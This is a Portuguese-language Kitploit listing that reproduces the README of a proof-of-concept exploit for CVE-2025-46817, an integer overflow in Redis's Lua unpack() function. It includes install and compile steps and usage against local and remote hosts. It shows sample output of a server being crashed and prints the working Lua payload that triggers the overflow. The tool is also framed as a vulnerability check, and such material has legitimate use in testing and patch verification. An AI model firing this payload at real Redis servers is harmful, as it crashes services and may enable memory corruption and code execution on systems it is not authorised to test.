Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-46817-PoC — Exploit baseado em C para CVE-2025-46817, uma vulnerabilidade de estouro de inteiro no Redis, permitindo detecção de crash e potencial RCE via payload Lua unpack(). | Kitploit
Ferramentas/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Análise de VulnerabilidadesExploraçãoFuzzingTestes de PenetraçãoSegurança de Banco de Dados
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

Exploit baseado em C para CVE-2025-46817, uma vulnerabilidade de estouro de inteiro no Redis, permitindo detecção de crash e potencial RCE via payload Lua unpack().

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de Estouro de Inteiro CVE-2025-46817 no Redis

Banner Language Platform

Uma implementação leve em C do exploit CVE-2025-46817 para a vulnerabilidade de estouro de inteiro no Redis.

🚀 Recursos

  • Leve: Arquivo C único, sem dependências externas além do hiredis
  • Rápido: Compilação nativa para máximo desempenho
  • Saída Colorida: Cores e ícones de terminal bonitos
  • Detecção de Crash: Detecta automaticamente falhas do servidor
  • Verificação de Versão: Identifica versões vulneráveis do Redis
  • Suporte a Timeout: Timeouts de conexão configuráveis

📋 Requisitos

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Compilação

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Uso

Uso Básico

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Alvo Remoto

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Opções de Linha de Comando

root@kitploit:~
-H <host>    Host do servidor Redis (obrigatório)
-P <port>    Porta do servidor Redis (obrigatório)  
-t <timeout> Timeout de conexão em segundos (padrão: 10)
-h           Mostrar mensagem de ajuda

📊 Exemplo de Saída

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Ferramenta de Exploit CVE-2025-46817
                   Estouro de Inteiro -> Cadeia RCE
                   Acesso -> https://pwnbuffer.org/

    Autor: Slayerkkk
    Alvo: Redis <= 8.2.1
    Tipo: Corrupção de Memória -> Execução de Código

ℹ️ Testando conexão com 127.0.0.1:6379...
✅ Conexão bem-sucedida
ℹ️ Versão do Redis: 8.2.1
❌ VULNERÁVEL - Versão <= 8.2.1
ℹ️ Testando script Lua...
✅ Lua habilitado (1+1=2)

🚀 INICIANDO EXPLORAÇÃO
==================================================
💀 Executando payload do exploit...
    Payload: Estouro de inteiro via unpack()
💥 SERVIDOR FALHOU - Conexão perdida!

📊 RESULTADO DA EXPLORAÇÃO
==============================
  💥 Status: falhou (2.34s)

💀 EXPLORAÇÃO BEM-SUCEDIDA - Servidor falhou!
   Vulnerabilidade CVE-2025-46817 confirmada

🛡️ Versões Afetadas

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Detalhes Técnicos

Vulnerabilidade

O exploit visa um estouro de inteiro na implementação da função Lua unpack() do Redis (luaB_unpack). Quando chamada com parâmetros específicos, a aritmética de inteiros com sinal transborda, fazendo o Redis tentar materializar um número enorme de valores de retorno.

Payload do Exploit

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Impacto

  • Falha do Servidor: Negação de serviço imediata
  • Corrupção de Memória: Corrupção de heap/stack
  • RCE Potencial: A corrupção de memória pode levar à execução de código

🎯 Resultados de Detecção

A ferramenta relata um destes status:

  • ✅ sobreviveu: O servidor lidou com o payload (provavelmente corrigido)
  • 💥 falhou: O servidor falhou (vulnerável)
  • ⚠️ timeout: O servidor travou (provavelmente vulnerável)
  • ❌ erro: Ocorreu outro erro

🙏 Créditos

Autor: Slayerkkk
Site: https://pwnbuffer.org

Baixar ferramenta